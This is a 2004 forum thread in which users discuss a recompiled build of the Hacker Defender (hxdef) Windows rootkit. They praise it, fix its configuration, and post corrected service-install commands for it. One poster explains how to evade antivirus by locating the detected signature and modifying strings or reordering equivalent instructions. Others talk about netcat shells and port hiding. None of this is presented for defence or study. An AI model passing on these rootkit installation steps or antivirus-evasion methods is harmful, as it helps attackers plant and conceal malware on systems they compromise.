Government Security
Network Security Resources

Jump to content

Photo

Hacker Defender Recompiled


  • This topic is locked This topic is locked
102 replies to this topic

#31 Burner

Burner

    Private First Class

  • Members
  • 23 posts

Posted 31 January 2004 - 08:10 AM

wooot your tha man
it works like heaven :D

thx a lot for the defender

greetz

#32 Thom

Thom

    Staff Sergeant

  • Members
  • 308 posts

Posted 31 January 2004 - 08:48 AM

clubfed want to hook me up with it? anything I can do to get it?

#33 shiz

shiz

    Private First Class

  • Members
  • 48 posts

Posted 31 January 2004 - 11:08 AM

thom:
if you launch a nc shell, did you do so from your installed ftpd?
if, yes, may i remind you that services defined in the .ini of hxdef are runnin with the sme privs as hxdef itself..
so, ofcourse you see your closed ports as open, because it is 'not infected'

here, an excerpt from the original hxdef readme.txt...

Root Processes is a list of programs which will be immune against
infection. You can see hidden files, directories and programs only with these
root programs. So, root processes are for rootkit admins. To be mentioned in
Root Processes doesn't mean you're hidden. It is possible to have root process
which is not hidden and vice versa.


so, what you probably did, was run nc from a program that was a root process and thus seeing all ports/services..

Holla!

#34 Guest_jak3c_*

Guest_jak3c_*
  • Guests

Posted 31 January 2004 - 12:27 PM

the best tools i know!.....
hanks

#35 phaeton

phaeton

    Specialist

  • Members
  • 137 posts

Posted 31 January 2004 - 01:47 PM

clubfed, 0.7.3? No port hiding at all there, so what would there be to complain about? Port hiding came in to effect in 0.8.4 :/

#36 sc0pe

sc0pe

    Private

  • Members
  • 5 posts

Posted 02 February 2004 - 03:49 AM

looks good, but the kit does not start at all, dont know why.

maybe u did an mistake during recompiling or editing the source...

#37 jimmy

jimmy

    Specialist

  • Members
  • 135 posts

Posted 02 February 2004 - 03:57 AM

lol scope
than you're the only one with that prob ;)
maybe you ini is (filtered) up
don't know
to install and start you can run install.cmd

#38 phaeton

phaeton

    Specialist

  • Members
  • 137 posts

Posted 02 February 2004 - 05:39 AM

sc0pe if the rk doesnt start at all its definitely your ini. Remeber, you cannot have whitespace characters (<>/|") in the values for settings (ie service name etc).

#39 Double-=V=-

Double-=V=-

    Private First Class

  • Members
  • 90 posts

Posted 02 February 2004 - 05:45 AM

Well the install.cmd is incorrect, but imho if you can't even see that you should not be using this.

#40 jimmy

jimmy

    Specialist

  • Members
  • 135 posts

Posted 02 February 2004 - 07:03 AM

lol double V
indeed, just saw it :)

should be

isplog.exe -:installonly
net start isplog
del install.cmd


#41 sc0pe

sc0pe

    Private

  • Members
  • 5 posts

Posted 02 February 2004 - 08:29 AM

yes i saw this directly after my post ;)
now works fine ;)

#42 Guest_ADiCToJUeGO_*

Guest_ADiCToJUeGO_*
  • Guests

Posted 02 February 2004 - 10:36 AM

Great Work! Lots of respect :)

#43 Guest_clubfed_*

Guest_clubfed_*
  • Guests

Posted 03 February 2004 - 03:04 PM

clubfed, 0.7.3? No port hiding at all there, so what would there be to complain about? Port hiding came in to effect in 0.8.4 :/

i've been getting the early betas for the past year, sorry i dont follow the public releases (holyfather didn't change the numbers, he added letters for release points..)

#44 Guest_clubfed_*

Guest_clubfed_*
  • Guests

Posted 03 February 2004 - 03:06 PM

clubfed want to hook me up with it? anything I can do to get it?

sorry, if i give it out it'll get picked up by av a lot sooner. i would recommend the aphex rootkit, except it has problems hiding netstat entries half the time... to take an existing rootkit and make it undetectable, load it in a debugger or hex editor and find what exact string the AV is detecting, and change it. in many cases you change switch asm instructions order, use equivelent replacements, etc... sorry.

#45 absolution

absolution

    Private First Class

  • Members
  • 41 posts

Posted 03 February 2004 - 05:00 PM

By string do you mean a text string? Or a string of a signature?

Changing text strings might beat Norton but wont do anything against a better AV.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users